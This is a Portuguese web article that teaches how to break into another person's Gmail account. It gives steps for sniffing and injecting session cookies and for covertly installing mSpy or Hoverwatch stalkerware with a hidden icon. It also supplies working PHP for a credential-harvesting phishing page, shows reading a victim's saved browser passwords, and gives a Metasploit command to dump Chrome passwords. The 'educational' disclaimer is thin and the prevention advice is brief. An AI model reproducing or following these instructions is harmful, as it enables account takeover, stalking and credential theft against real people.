Hackear o Gmail em minutos
Um hack muito procurado
O Gmail ou Google hacking é o segundo hacking mais procurado na internet depois do Facebook.
É evidente que o hacking de uma conta Google dá acesso não apenas ao Gmail, mas também a seus principais parceiros, tais como Android, YouTube, Drive, Hangouts e assim por diante.
As pessoas acham que hackear uma conta Google é fácil e que tudo o que elas precisam é de uma ferramenta de hacking online ou offline, mas a verdade é bem diferente.
O programa Bug Bounty do Google
Você acha que uma empresa inovadora como o Google é estúpida o suficiente para deixar uma empresa multibilionária ficar presa por um único site? Na verdade, está muito consciente destas técnicas graças ao seu programa Bug Bounty.
Através deste programa, pesquisadores de segurança e hackers ao redor do mundo encontram e relatam vulnerabilidades de segurança (técnicas de hacking ou fraquezas do sistema) ao Google.
O Google toma medidas para corrigi-los e recompensa aqueles que fazem divulgações responsáveis.
O propósito deste artigo
Então, como algumas pessoas conseguem hackear sua senha do Google quando não há ferramentas de hacking disponíveis? Não há uma solução fácil, mas isso não significa que seja impossível.
Sim, há maneiras de hackear uma Conta Google, mesmo que você possa facilmente evitá-la. A lista a seguir detalha como os hackers invadem nossa Conta Google e o que podemos fazer para impedi-lo.
Tenha em mente que este artigo é publicado para educar as pessoas e não deve ser usado para fins maliciosos.
Hacking de uma conta no Gmail
Hacking de um endereço Gmail usando cookies
Um cookie é uma seqüência única de caracteres que contém o caminho para seu e-mail.
Esta seqüência expira quando você tenta fechar ou sair da conta de e-mail. Tem uma vida útil de 20 minutos e pode fechar naturalmente se a página da conta de e-mail estiver inativa.
Você pode hackear o Gmail com este cookie. Há arquivos de cookie roubados na teia escura que fornecem o caminho para a caixa postal da vítima.
Ferramenta de captura de cookies
Suponha que você esteja usando seu computador em uma rede local. A vítima também está funcionando na mesma rede local. Você pode então usar uma ferramenta de captura de cookies para cheirar todos os pacotes de e para o computador da vítima.
Alguns desses pacotes contêm informações de cookies. Estes pacotes podem ser decodificados usando esta ferramenta de captura de cookies e você pode obter facilmente as informações de cookies necessárias para hackear uma conta de e-mail.
Os softwares Wireshark e HTTP Debugger Pro podem ser usados para capturar cookies.
Ferramenta de edição de biscoitos
Depois de ter capturado com sucesso os cookies de sua vítima, você precisa injetá-los em seu navegador.
Isto é feito usando uma ferramenta de injeção de biscoitos. Em alguns casos, após a injeção, você também precisará modificar os cookies.
Esta injeção e edição de biscoitos pode ser feita usando o simples addon Firefox Cookie-Editor ou o script Greasemonkey.
Desvantagens do roubo de cookies
O roubo de cookies é negligenciado porque tem sérios inconvenientes:
O cookie tem uma data de expiração. A expiração dos cookies é implementada de duas maneiras:
- Atribuindo um carimbo de tempo específico
- Verificando a presença de acionadores como a saída do usuário do navegador da web. Neste caso, cada vez que o usuário sai do navegador, seu cookie expira e nosso cookie capturado se torna inútil.
O roubo de cookies se torna inútil em um ambiente criptografado SSL, ou seja, para links https (Secure HTTP).
Além disso, a maioria dos cookies expira assim que a vítima pressiona o botão LogOut. Portanto, você precisa implementar este hack de roubo de cookies quando o usuário estiver logado… a menos que o alvo esteja acostumado a verificar “Lembre-se de mim”.
Neste caso, ele não desconecta sua conta do seu PC.
Hackeando o Gmail instalando um keylogger
É um programa que roda secretamente no fundo do computador sem o conhecimento do usuário.
Este software registra cada pressionamento de tecla no teclado e ajuda os hackers a encontrar a senha correta da conta Gmail.
Os programas de keylogging para hackear a conta do Gmail em um smartphone incluem o seguinte:
- mSpy
- Hoverwatch
mSpy
Este software é compatível com as plataformas Android e iOS. Para instalá-lo nos dispositivos iOS, é necessário quebrar a prisão para obter um ótimo desempenho. Você também pode instalá-lo sem fuga da prisão, mas não receberá as discussões sobre as redes sociais.
Esta é uma das mais populares aplicações de controle parental, com várias características incorporadas.
Características
- Instalação e operação simples
- Funciona bem em modo stealth
- Manipula chamadas
- Monitoramento de SMS
- Rastreamento em tempo real da localização do telefone
- Monitorar atividades online
Passos
Acesse o site oficial da mSpy, compre a assinatura e faça o download da ferramenta.
Você pode escolher a versão Android ou iOS de acordo com suas necessidades.
Alterar as configurações do dispositivo alvo Android
- Você receberá um e-mail de confirmação contendo os detalhes do pedido, link para o painel de controle, nome de usuário e senha.
- Toque no link de confirmação para autenticar a ferramenta e fazer alterações em seu dispositivo alvo.
- Ir para “Configurações -> Segurança -> Fontes desconhecidas”. Pressione o botão de comutação “Unknown Sources” para permitir o processo de instalação.
Instalando o mSpy no telefone de destino
- Pegue o telefone e vá para o link fornecido no e-mail.
- Clique no arquivo .apk que aparece
- O dispositivo alvo Android exibe uma tela para o processo de instalação
- Pressione o botão “Next” no assistente e pressione o botão “Install” para iniciar o procedimento.
Cadastre-se no mSpy
Logo após o processo de instalação, você deve :
- aceitar os termos da licença
- atualizar o serviço
- conceder permissão para ocultar o ícone no dispositivo alvo
- digite o código de registro e pressione “Finish” para finalizar o processo de instalação.
Abra o Keylogger
Agora que o mSpy está instalado no telefone de destino, você pode deixá-lo e ir para a Internet a partir de seu telefone ou computador.
- Digite sua conta mSpy usando o login e a senha fornecidos quando você criou sua conta.
- Abra o painel de instrumentos.
- Pressione a opção “Keylogger” no lado esquerdo da tela.
Ver detalhes do Keylogger
Veja as teclas do dispositivo alvo usando esta função do Keylogger. Ele exibe o nome, a mensagem e a hora.
Com a ajuda do Keylogger, você pode visualizar com precisão e-mails, textos, mensagens, mídias sociais.
Como hackear uma conta de gmail com a Hoverwatch
Com o aplicativo Hoverwatch, o método de instalação é praticamente o mesmo, exceto que ele não oferece uma instalação do iPhone sem fuga de prisão.
Para ter plena funcionalidade, você terá que root o Android ou quebrar a prisão do iPhone.
A vantagem é que este software, uma vez instalado, será capaz de gravar voz, conversas e até mesmo o que é dito ao redor do telefone no momento em que você o aciona remotamente.
Site oficial da Hoverwatch aqui.
Hacking de uma conta Gmail com a técnica de phishing
Phishing é uma técnica na qual o hacker cria uma página de login fictícia no Gmail.
Esta página aparece na tela da vítima, e a vítima não será capaz de detectá-la. O hacker entra com as credenciais do Gmail nesta página dupla, que imediatamente envia os detalhes para o atacante. A vítima revela a senha para o hacker através desta página de login suspeita do Gmail.
Neste tutorial Wapka, usaremos Wapka para recuperar as senhas das vítimas, ID do Gmail, navegador e endereço IP.
Wapka é uma plataforma gratuita de criação de sites com hospedagem gratuita de sites onde podemos criar um site de phishing em um minuto. A vantagem do Wapka é que ele é muito fácil de usar e não requer muito conhecimento de PHP ou MySql. Ele também não bloqueia sua conta como qualquer outra hospedagem gratuita.
Este tutorial para hacking Gmail foi desenvolvido para qualquer pessoa que goste de hacking mas não queira adquirir grandes habilidades de codificação.
Como posso começar?
O objetivo é criar um site de phishing que se pareça com o site móvel do Gmail e envie os detalhes da vítima para nosso endereço de e-mail juntamente com senhas, endereço de e-mail, endereço IP e informações do navegador.
- Abra o gmail.com e clique com o botão direito do mouse na página
- Você verá muitas opções, basta selecionar a fonte de exibição
- Copie o código completo (pressione CTRL+A e depois CTRL+C em seu teclado para copiar o código completo)
- Abra o bloco de notas e cole o código pressionando CTRL+V
- Vá até a parte superior e pressione CTRL+F em seu teclado.
- Uma caixa de diálogo aparece na tela
- Digite “action=” no espaço fornecido, sem aspas.
- Substituir o link correspondente à action= pelo post.php
- Salvar o arquivo do bloco de notas sob o nome index.html
- Se você receber um aviso, pressione ok
- Abra um novo arquivo de bloco de notas e copie e cole o código abaixo
<?php header ('Location:http://www.gmail.com/'); $handle = fopen( usernames. txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Se você quiser que o usuário seja redirecionado para a página original do gmail.com após digitar sua senha e nome de usuário, deixe o código como está.
Se você quiser redirecionar a vítima para um novo site, substitua “http://www.gmail.com/” pelo nome do site desejado no código.
Agora que você terminou de fazer sua página de phishing, abra index.html para visualizar sua página.
Você verá que sua página de phishing não é a mesma que a página original do Gmail, faltam muitas imagens e o logotipo.
Basta abrir index.html no Bloco de Notas, clicar com o botão direito do mouse em index.html, clicar em abrir com e selecionar bloco de notas.
Pressione CTRL+F para encontrar os links a seguir e substitua-os pelas imagens corretas:
- Substituir: //ssl.gstatic.com/accounts/ui/logo_2x.png (logotipo Google)
- Por: //i.imgur.com/8aPqK7U.png
Faça o mesmo para as seguintes imagens, hospedando as imagens certas:
- //ssl.gstatic.com/accounts/ui/avatar_2x.png (o avatar)
- //ssl.gstatic.com/accounts/ui/logo_strip_2x.png (tira logotipo)
- //ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png (ícone do idioma)
Agora salve seu trabalho e abra o index.html novamente clicando duas vezes sobre ele. Sua página deve se parecer exatamente com a página original do Gmail.
Hospede sua página de phishing do Gmail (tanto index.html quanto post.php) em sites de hospedagem gratuita para hackear completamente o Gmail.
Hackear o endereço do Gmail usando o gerenciador de senhas do navegador
- No computador da vítima, abra o navegador e vá para “Settings” tocando os três pontos verticais no canto superior direito do navegador.
- Na opção “Settings”, selecione a opção “Autofill” no lado esquerdo da tela.
- No painel direito, escolha “Senhas” para ver a lista de senhas salvas.
- Pressione o botão “olho” ao lado da senha para ver os detalhes.
- A senha torna-se visível, e você pode anotar a senha do Gmail
Esta técnica só funciona se a vítima não tiver habilitado o processo de autenticação de dois fatores ao se conectar. Porque, neste caso, a senha não é suficiente para abrir a conta do Gmail (o telefone também é necessário).
Como recuperar senhas no Windows
O Chrome usa um recurso do Windows chamado CryptProtectData para criptografar senhas armazenadas em computadores com uma chave gerada aleatoriamente.
Somente um usuário com a mesma chave de login que aquele que criptografou os dados pode decodificar as senhas mais tarde. É difícil, sob estas condições, hackear uma conta no Gmail. Cada senha é criptografada com uma chave aleatória diferente em um pequeno banco de dados no computador.
Este banco de dados pode ser encontrado no diretório abaixo:
%LocalAppData%\Google\Chrome\User Data\Default\Login Data
É necessário usar um módulo Metasploit sob Linux para recuperar em texto claro as senhas armazenadas no navegador Chrome.
Use o módulo enum_chrome como mostrado no comando abaixo. Este módulo coleta dados de usuários do Google Chrome e tenta decifrar informações sensíveis.
run post/windows/gather/enum_chrome
As senhas serão salvas automaticamente no diretório /root/.msf4/loot/. O arquivo .txt recém-criado contendo as senhas será nomeado automaticamente usando a data e o endereço IP do usuário alvo.
Uma conta de gmail invadida por causa de um cavalo de Tróia
Um cavalo de Tróia é um programa de spyware que monitora e controla as atividades do Gmail da vítima.
Este programa se esconde em arquivos de mídia, e entra no computador da vítima quando ela faz o download de software ou arquivos da Internet. O atacante recebe um arquivo de registro e penetra rapidamente na página do Gmail da vítima.
Quando você baixa um software hackeado da Internet, todos os keygens e patches são hackeados. Isto significa que você receberá o software de graça. Mas seu computador será afetado por um cavalo de Tróia.
Quando você executa o patch/keygen, você obtém o resultado desejado, mas em segundo plano, seu sistema é infectado pelo Trojan.
Turkojan é um famoso troiano. Um troiano é muito superior aos keyloggers e aos RATs. Ele oferece muito mais funções, para que um hacker tenha acesso mais fácil ao seu PC.
Como instalar o Turkojan – Vídeo tutorial
A melhor maneira de hackear o Gmail
Evite o roubo de sua conta Gmail
Mais de 60% das pessoas usam o mesmo nome de usuário e senha para todas as suas contas.
Os hackers usam programas que capturam detalhes de nomes de usuários e senhas roubadas de dezenas de milhares de sites até que um deles seja acessado.
Eles então têm acesso às suas contas e credenciais. Se você usar o mesmo nome de usuário e senha para todas as suas contas, você pode estar vulnerável.